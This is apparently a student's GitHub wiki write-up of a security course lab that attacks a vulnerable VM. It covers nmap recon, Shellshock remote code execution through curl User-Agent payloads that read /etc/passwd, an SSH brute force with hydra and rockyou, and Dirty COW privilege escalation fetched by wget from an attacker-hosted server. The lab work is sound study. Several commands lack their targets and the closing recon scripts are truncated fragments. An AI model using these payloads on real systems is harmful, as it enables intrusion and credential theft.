Lab 4.1: Exploiting Cupcake - squatchulator/Tech-Journal GitHub Wiki

Lab 4.1 - Exploiting Cupcake


In this lab, I had a lot of trouble getting the remote code execution working properly. The commands had strange syntax that I wasn't familiar with, and a lot of what was slipping me up was just small syntax mistakes. Adam was a huge help in class with diagnosing what exactly in those one-liners was incorrect. Another issue I had was getting hydra to work properly. I wasn't sure if I was using the tool wrong or if the /etc/passwd file on the target system was messed up from another user, but I wasn't able to brute-force using hydra so I just entered each password in the generated list instead (not realistic for bigger applications, but worked for now). I would like to learn more about hydra though, as it's a really interesting tool and I was not aware that tools like this existed.

Pt. 1: Active Recon

  • sudo nmap
    • The server has ports 22 and 80 open.
  • sudo nmap -A
    • Port 22 is running OpenSSH 5.3 (Protocol 2.0)
    • Port 80 is running Apache httpd 2.2.15 on CentOS (Linux Kernel v2.6)
  • curl
    • <a href="../cgi-bin/status">Server Status Report</a>

Pt. 2: Dealing with Targets and Scans

  • First, install nmaptocsv with the following commands:
sudo apt update
sudo apt install python3-pip
sudo pip install nmaptocsv
  • Then, export the nmap to a csv.
sudo nmap -sT -sV --top-ports=100 -Pn -oG top100.txt
nmaptocsv -i top100.txt -d ","
  • Copy output, paste into spreadsheet, and select "Split text to columns"

Pt. 3: Vulnerability Detection

Vulnerabilities: (Shellshock)

Pt. 4: Remote Code Execution Vulnerability

- Determine the target's running kernel version
sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /usr/bin/whoami"

- Show OS release

curl -H "User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/redhat-release" bash -s :''

- Show contents of /etc/passwd
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' --output - >> users.txt

- Show code behind the status cgi
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat ../cgi-bin/status' bash -s :''

- Show results of running ifconfig
curl -H 'User-Agent: () { :; }; echo ; echo ; /sbin/ifconfig' bash -s :''

Pt. 5: The foothold

Extract the contents of the rockyou password list with:

  • zcat /usr/share/wordlists/rockyou.txt.gz | grep -i samwise >> passwords.txt Now, run a Hydra against that user with all the possible passwords:
  • hydra -l samwise -p passwords.txt -t 4 ssh

Pt. 6: Root Compromise

  • On Kali, run searchsploit -m 40839 to pull the exploit
  • Spawn a temporary web server instance with python3 -m http.server 9191 (port can be whatever)
  • On the target system, make a new working directory and run wget http://<attacking ip>:9191
  • Now, compile the exploit code with gcc 40839.c -o cow -lpthread -lcrypt
  • Run the code with ./cow and enter a new password.
  • To reset the machine, run mv /tmp/passwd.bak /etc/passwd


if [ "$#" -ne 2 ]; then
  echo "Incorrect parameter usage. Usage: $0 <ip> <dnsserver>"
  exit 1
  echo "Working..."
echo "DNS Resolution for $ip" >> recon.txt
nslookup $ip $dnsserver | grep name >> recon.txt
sudo nmap -A >> recon.txt 
curl http://$ip >> recon.txt


# Script help from:
$table = @()

for ($i = 0; $i -lt 255; $i++){
	$ipaddr = "$pref.$i"
	$result = Resolve-DnsName - DnsOnly $ipaddr -Server $server -ErrorAction Ignore
	if ($result){
		$ipTable = New-Object PSObject -Property @{
			IPAddress = $ipaddr
			NameHost = $result.NameHost
		$table += $ipTable
$table | Select-Object IPAddress, NameHost | Format-Table -AutoSize
⚠️ ** Fallback** ⚠️